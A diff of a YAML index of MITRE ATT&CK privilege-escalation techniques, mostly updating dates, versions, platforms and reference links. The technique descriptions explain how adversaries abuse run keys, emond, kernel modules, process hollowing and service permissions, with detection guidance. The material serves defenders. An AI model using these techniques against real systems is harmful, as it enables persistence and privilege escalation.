+          Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
       - source_name: Microsoft Assoc Oct 2017
         description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
           7, 2018.
@@ -19997,7 +20317,8 @@ privilege-escalation:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.001
     atomic_tests: []
   T1055.014:
@@ -20068,7 +20389,7 @@ privilege-escalation:
         resources, and possibly elevated privileges. Execution via VDSO hijacking
         may also evade detection from security products since the execution is masked
         under a legitimate process.  "
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-07T17:09:09.048Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: VDSO Hijacking
       x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -20095,7 +20416,6 @@ privilege-escalation:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.014:
     technique:
@@ -20135,7 +20455,7 @@ privilege-escalation:
         The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
 
         Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T00:16:01.732Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Emond'
       x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -20155,12 +20475,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.014
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -20214,11 +20533,10 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547.001:
     technique:
-      modified: '2023-10-16T09:08:22.319Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
       description: |-
         Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -20305,9 +20623,9 @@ privilege-escalation:
           in the Registry. Retrieved August 3, 2020.
         url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Oddvar Moe RunOnceEx Mar 2018
         description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
           from Autoruns.exe. Retrieved June 29, 2018.
@@ -20320,12 +20638,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.001
     atomic_tests: []
   T1098:
     technique:
-      modified: '2024-01-16T22:24:38.234Z'
+      modified: '2024-10-15T15:35:57.382Z'
       name: Account Manipulation
       description: "Adversaries may manipulate accounts to maintain and/or elevate
         access to victim systems. Account manipulation may consist of any action that
@@ -20361,16 +20678,15 @@ privilege-escalation:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - SaaS
       - Network
       - Containers
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -20411,143 +20727,141 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098
     atomic_tests: []
   T1547.006:
     technique:
-      x_mitre_platforms:
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-12T17:30:54.170Z'
+      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+      description: |-
+        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
+
+        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
       x_mitre_contributors:
       - Wayne Silva, F-Secure Countercept
       - Anastasios Pingios
       - Jeremy Galloway
       - Red Canary
       - Eric Kaiser @ideologysec
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: |
+        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
+
+        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'File: File Creation'
+      - 'File: File Modification'
+      - 'Kernel: Kernel Module Load'
+      - 'Process: Process Creation'
+      x_mitre_permissions_required:
+      - root
       type: attack-pattern
       id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
       created: '2020-01-24T17:42:23.339Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1547.006
         url: https://attack.mitre.org/techniques/T1547/006
+        external_id: T1547.006
       - source_name: Apple Developer Configuration Profile
-        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
         description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
           September 23, 2021.
+        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
       - source_name: Apple Kernel Extension Deprecation
-        url: https://developer.apple.com/support/kernel-extensions/
         description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
           Alternatives. Retrieved November 4, 2020.
+        url: https://developer.apple.com/support/kernel-extensions/
       - source_name: System and kernel extensions in macOS
-        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
         description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
           March 31, 2022.
+        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
       - source_name: GitHub Reptile
-        url: https://github.com/f0rb1dd3n/Reptile
         description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
           April 9, 2018.
+        url: https://github.com/f0rb1dd3n/Reptile
       - source_name: Volatility Phalanx2
-        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
         description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
           to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
       - source_name: iDefense Rootkit Overview
-        url: http://www.megasecurity.org/papers/Rootkits.pdf
         description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
-          April 6, 2018.
+          September 12, 2024.
+        url: https://www.megasecurity.org/papers/Rootkits.pdf
       - source_name: Linux Loadable Kernel Module Insert and Remove LKMs
-        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
         description: Henderson, B. (2006, September 24). How To Insert And Remove
           LKMs. Retrieved April 9, 2018.
+        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
       - source_name: CrowdStrike Linux Rootkit
-        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
         description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
           Retrieved December 21, 2017.
+        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
       - source_name: GitHub Diamorphine
-        url: https://github.com/m0nad/Diamorphine
         description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
           Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+        url: https://github.com/m0nad/Diamorphine
       - source_name: Securelist Ventir
-        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
         description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
           your MacOS spy. Retrieved April 6, 2018.'
+        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
       - source_name: User Approved Kernel Extension Pike’s
-        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
         description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
           Loading…. Retrieved September 23, 2021.
+        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
       - source_name: Linux Kernel Module Programming Guide
-        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
         description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
           Retrieved April 6, 2018.
+        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
       - source_name: Linux Kernel Programming
-        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
         description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
           Module Programming Guide. Retrieved April 6, 2018.
+        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
       - source_name: Trend Micro Skidmap
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
         description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
           Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
           Retrieved June 4, 2020.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
       - source_name: Purves Kextpocalypse 2
-        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
         description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
           . Retrieved September 23, 2021.
+        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
       - source_name: RSAC 2015 San Francisco Patrick Wardle
-        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
         description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
           Retrieved April 6, 2018.
+        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
       - source_name: Synack Secure Kernel Extension Broken
-        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
         description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
           Extension Loading’ is Broken. Retrieved April 6, 2018.
+        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
       - source_name: Wikipedia Loadable Kernel Module
-        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
         description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
           April 9, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
-
-        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
-        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
-        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
-        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
-      x_mitre_detection: |
-        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
-        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
-
-        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      - kill_chain_name: mitre-attack
-        phase_name: privilege-escalation
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'File: File Creation'
-      - 'File: File Modification'
-      - 'Kernel: Kernel Module Load'
-      - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - root
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.006
     atomic_tests: []
   T1574.013:
@@ -20584,7 +20898,7 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -20610,12 +20924,10 @@ privilege-escalation:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -20693,9 +21005,8 @@ privilege-escalation:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1574:
@@ -20762,7 +21073,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.005:
     technique:
@@ -20836,11 +21146,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -20857,7 +21166,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -20867,7 +21175,7 @@ privilege-escalation:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -20876,19 +21184,17 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -20936,11 +21242,12 @@ privilege-escalation:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.012:
     technique:
-      modified: '2023-08-11T21:37:00.009Z'
+      modified: '2024-09-12T15:11:45.602Z'
       name: 'Process Injection: Process Hollowing'
       description: "Adversaries may inject malicious code into suspended and hollowed
         processes in order to evade process-based defenses. Process hollowing is a
@@ -21008,23 +21315,22 @@ privilege-escalation:
           Retrieved December 7, 2017.'
         url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
       - source_name: Leitch Hollowing
-        description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
-          2014.
-        url: http://www.autosectools.com/process-hollowing.pdf
+        description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+          2024.
+        url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
       - source_name: Mandiant Endpoint Evading 2019
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.012
     atomic_tests: []
   T1068:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-04-07T17:13:54.168Z'
       name: Exploitation for Privilege Escalation
       description: |-
         Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
@@ -21087,11 +21393,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546:
     technique:
-      modified: '2024-03-01T15:49:15.588Z'
+      modified: '2024-10-15T15:57:00.731Z'
       name: Event Triggered Execution
       description: "Adversaries may establish persistence and/or elevate privileges
         using system mechanisms that trigger execution based on specific events. Various
@@ -21144,8 +21449,8 @@ privilege-escalation:
       - Windows
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'WMI: WMI Creation'
@@ -21193,78 +21498,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546
     atomic_tests: []
   T1546.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Robert Wilson
-      - Tony Lambert, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
-      type: attack-pattern
-      created: '2020-01-24T14:13:45.936Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1546.004
-        url: https://attack.mitre.org/techniques/T1546/004
